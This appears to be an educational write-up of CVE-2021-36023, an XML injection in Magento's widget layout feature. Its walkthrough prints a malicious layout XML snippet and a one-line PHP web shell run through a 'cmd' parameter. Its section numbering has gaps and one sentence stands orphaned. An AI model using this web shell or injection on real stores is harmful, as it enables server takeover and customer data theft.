CVE-2021-36023 - XML Injection in Magento Widgets Leads to Remote Code Execution

CVE-2021-36023 is an _XML Injection_ flaw in the Widgets "Update Layout" functionality within the Magento admin backend. An attacker with administrator permissions can abuse this functionality to inject malicious XML—ultimately resulting in remote code execution (RCE) on the server.

CVE Details at NVD:
https://nvd.nist.gov/vuln/detail/CVE-2021-36023
Adobe Security Bulletin:
https://helpx.adobe.com/security/products/magento/apsb21-50.html

3. How the Vulnerability Works

Magento uses XML files to define the structure and layout of pages. Inside the admin, widgets can have their layout updated by passing XML to the server. Magento does not fully sanitize or validate this XML before applying it, which means crafted XML allows an attacker to manipulate how code is executed (or even introduce system commands).

The Dangerous Point

This vulnerability is rooted in how Magento merges and parses admin-supplied XML. Improper handling of user input here means arbitrary XML can reach sensitive code, like block class instantiation or even direct PHP code execution through crafted layouts.

4. Exploit Walkthrough

Let’s go step-by-step to see how an attacker might achieve Remote Code Execution using this flaw.

Step A: Crafting Malicious Layout XML

Consider the following XML snippet, which an attacker might use in the "Widget Update Layout" field while editing or creating a new widget in the Magento backend:

<layout>
    <update handle="CUSTOM_HANDLE"/>
    <referenceContainer name="page.top">
      <block class="Magento\Framework\View\Element\Template" template="Magento_Theme::html/evil.phtml"/>
    </referenceContainer>
</layout>

Now, if the attacker is able to upload or create evil.phtml under the relevant Magento directory, they could insert arbitrary PHP code and have it executed as part of the normal page rendering process.

Uses the injected layout XML to reference and render this file.

If user-supplied parameters allow, it's even possible to use more advanced Magento classes to fetch remote files, execute PHP code directly, or chain additional vulnerabilities.

If evil.phtml contains

<?php system($_GET['cmd']); ?>

And is placed by the attacker in the path Magento knows, the following request will execute code

https://mystore.com/?cmd=whoami

5. What Makes this Attack Dangerous?

- Privilege Level: Admin, while trusted, are often compromised through phishing, shared passwords, or stolen sessions.

Persistence: Malicious code can persist long-term, even after logs are wiped.

- Typical Impact: Site defacement, theft of customer data, credit card skimming (Magecart), or full server takeover.

7. References

- Adobe Magento Security Updates
- Magento Official Release Notes
- NIST National Vulnerability Database
- Exploit-DB (proof of concept discussions)

8. Final Thoughts

CVE-2021-36023 highlights the dangers of handling user-supplied XML—even in admin-only areas. If you are running an affected version of Magento, patch immediately and audit your admin panel users regularly. Even admins can be vector points for major breaches, especially in the e-commerce world, where credit card info and personal data are at constant risk.

Stay secure, keep Magento updated, and never trust user input—no matter where it comes from!


Disclaimer:
This article is for educational purposes only. Never attempt to exploit vulnerabilities without explicit permission. Always patch your systems and practice responsible disclosure.

Timeline

Published on: 09/06/2023 14:15:00 UTC